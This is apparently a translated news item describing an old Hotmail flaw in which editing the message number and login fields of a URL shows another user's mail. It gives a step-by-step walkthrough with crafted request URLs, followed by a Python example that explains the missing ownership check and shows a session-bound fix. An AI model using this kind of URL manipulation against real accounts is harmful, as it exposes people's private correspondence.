Recently, a Hotmail user discovered that by simply changing a few values in an address, such as the message number, it is possible to view other people's mail content. Because the message numbers follow certain rules, this is easy. To do this, you need two Hotmail mailboxes.
The address used to peek at the mail:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&HM___TG=HTTP%3A%2F%2F64%2E4%2E36%2E250%2FCGI%2Dbin%2FGETMSG&HM___qs=%26MSG%3DMSGXXXXXXXXX%2E(X)X%26Start%3D1%26LEN%3D9999999999%26login%3dusername%26Domain%3Dhotmail%2ECOM
Here XXXXXXXXX is the message number, username is the user account, and (X)X is a seconds code between 0 and 59.
For example, suppose you have a mailbox called R00Tarded@hotmail.com. First log in to this mailbox and open any email; the address in the address bar will be:
http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=f000000001&a=5691b2b4e104176111971aa0fbb12747341a0fbb12747.3&start=197078&len=1060&msgread=1&mfs=182
The number of this email is MSG998000947.3. Copy the address and log out.
Then log in to the other mailbox. Insert the message number and account name from above into the address and enter it in the address bar:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=en&hm__tg=http://64.4.36.250/CGI-bin/GETMSG&HM___qs=&msg=MSG998000947.3%26Start%3D1%26LEN%3D99999999999%26login%3DR00TARDED%26DOMAIN%3Dhotmail%2ECOM
Press Enter. What did you see? Yes, the contents of the email in R00Tarded@hotmail.com.
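The flaw described above is a missing ownership check: the mailbox that is read is chosen by the login and domain fields in the URL rather than by the logged-in session. The following Python sketch is an added example, not Hotmail's code; it decodes the forwarded query string and contrasts the flawed lookup with a check bound to the session. The function names, the MAILBOX_INDEX table and the second@hotmail.com account are hypothetical.

```python
from urllib.parse import parse_qs, unquote

# Constructed sample: the forwarded query string from the walkthrough,
# percent-encoded the way it travels in the hm___qs parameter.
SAMPLE_QS = ("%26msg%3DMSG998000947.3%26start%3D1%26len%3D99999999999"
             "%26login%3DR00TARDED%26domain%3Dhotmail%2Ecom")

# Hypothetical server-side index: account -> message numbers it owns.
MAILBOX_INDEX = {
    "r00tarded@hotmail.com": {"MSG998000947.3"},
    "second@hotmail.com": {"MSG998000101.12"},  # constructed second account
}

def parse_getmsg_query(encoded_qs):
    """Decode the forwarded query string into lower-cased field names."""
    decoded = unquote(encoded_qs).lstrip("&")
    return {k.lower(): v[0] for k, v in parse_qs(decoded).items()}

def mailbox_trusting_url(params):
    """Flawed pattern: the mailbox to read is whatever the URL names."""
    return f"{params.get('login', '')}@{params.get('domain', '')}".lower()

def authorize_getmsg(session_account, params, index=MAILBOX_INDEX):
    """Hardened pattern: the mailbox comes from the authenticated session,
    and the message must belong to that mailbox."""
    session_account = session_account.lower()
    if mailbox_trusting_url(params) != session_account:
        return (False, "login/domain in URL does not match session")
    if params.get("msg") not in index.get(session_account, set()):
        return (False, "message not in the session's mailbox")
    return (True, session_account)

if __name__ == "__main__":
    p = parse_getmsg_query(SAMPLE_QS)
    print("flawed lookup reads:", mailbox_trusting_url(p))
    print("other session:", authorize_getmsg("second@hotmail.com", p))
    print("owner session:", authorize_getmsg("r00tarded@hotmail.com", p))
```

The second check matters because the article notes that message numbers follow predictable rules, so a guessed number must still be rejected when it is not in the session's own mailbox.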
Please note that this vulnerability had not been repaired at the time it was published. (Zhang Forever)
(Editor: CATHY)